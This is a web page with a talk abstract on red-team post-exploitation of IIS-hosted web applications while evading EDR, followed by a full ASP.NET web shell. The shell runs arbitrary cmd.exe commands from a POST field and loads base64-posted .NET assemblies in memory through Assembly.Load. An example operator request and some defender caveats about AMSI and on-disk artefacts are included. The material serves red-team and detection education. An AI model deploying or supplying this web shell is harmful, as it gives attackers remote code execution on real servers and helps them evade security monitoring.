Don’t Touch Disk, Disk is Lava
Security controls such as endpoint detection and response (EDR) continue to mature, increasing the effort adversaries must invest to execute intrusions, remain undetected and achieve their objectives. This presentation covers techniques that red teams can use for post-exploitation against web applications hosted on Microsoft's Internet Information Services (IIS) while evading modern security controls. It first discusses the problems with traditional "cmd.exe" web shells, which give the defender an easy signal: a cmd.exe child process under the IIS worker process (w3wp.exe) with the operator's command line. It then demonstrates more mature web shells that instead use reflective assembly loading and deserialisation to run tooling inside the existing worker process, without spawning new processes or writing the tooling to disk.
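As an added illustration of the contrast the abstract draws (this is example code written for this page, not code from the presentation or its author), the ASP.NET Web Forms page below offers two modes side by side: the traditional style, which has w3wp.exe spawn cmd.exe, and the reflective style, which loads a .NET assembly posted as base64 directly from a byte array inside the worker process. The page name, the form-parameter names (`mode`, `cmd`, `asm`, `type`, `method`, `args`) and the assumed `static string Method(string)` signature of the posted tool are all assumptions; the deserialisation variant mentioned in the abstract is not shown here.

```csharp
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.Reflection" %>
<script runat="server">
    // Added example: two web-shell styles side by side.
    // Parameter names and the page name are assumptions, not taken from the talk.
    protected void Page_Load(object sender, EventArgs e)
    {
        string mode = Request.Form["mode"];
        if (mode == "cmd")
        {
            Response.Write(RunCommand(Request.Form["cmd"]));
        }
        else if (mode == "load")
        {
            Response.Write(LoadAndInvoke(
                Request.Form["asm"], Request.Form["type"],
                Request.Form["method"], Request.Form["args"]));
        }
    }

    // Traditional style: w3wp.exe spawns cmd.exe as a child process.
    // Nothing is written to disk, but the process tree (w3wp.exe -> cmd.exe)
    // and the full command line are exactly what EDR process-creation
    // telemetry and Sysmon Event ID 1 record.
    static string RunCommand(string cmd)
    {
        var psi = new ProcessStartInfo("cmd.exe", "/c " + cmd)
        {
            RedirectStandardOutput = true,
            RedirectStandardError = true,
            UseShellExecute = false,
            CreateNoWindow = true
        };
        using (var p = Process.Start(psi))
        {
            string output = p.StandardOutput.ReadToEnd() + p.StandardError.ReadToEnd();
            p.WaitForExit();
            return output;
        }
    }

    // Reflective style: the operator POSTs a base64-encoded .NET assembly and
    // the page loads it from the byte[] inside the w3wp.exe worker process.
    // No child process is created and no file is written; the tooling runs
    // in the existing, already-trusted IIS process.
    static string LoadAndInvoke(string b64Assembly, string typeName, string methodName, string args)
    {
        byte[] raw = Convert.FromBase64String(b64Assembly);
        Assembly asm = Assembly.Load(raw);               // in-memory load, no path on disk
        Type t = asm.GetType(typeName, true);            // throws if the type is missing
        MethodInfo m = t.GetMethod(methodName, BindingFlags.Public | BindingFlags.Static);
        if (m == null)
        {
            throw new MissingMethodException(typeName, methodName);
        }
        // Assumed tool signature: public static string Method(string args)
        object result = m.Invoke(null, new object[] { args ?? string.Empty });
        return result == null ? string.Empty : result.ToString();
    }
</script>
```

An operator would drive the second mode with a POST such as `mode=load&asm=<base64 of Tool.dll>&type=Tool.Program&method=Run&args=whoami`, compiling the tooling offline so that only the base64 blob ever crosses the wire. Two caveats a defender or tester should keep in mind: the .aspx page itself is still a file on disk that ASP.NET compiles into its Temporary ASP.NET Files directory, so the "disk is lava" gain applies to the tooling loaded through it rather than to the shell page; and on .NET Framework 4.8 and later, `Assembly.Load(byte[])` is submitted to AMSI before the assembly is loaded, so an in-memory load is no longer invisible to an AMSI-enabled endpoint product.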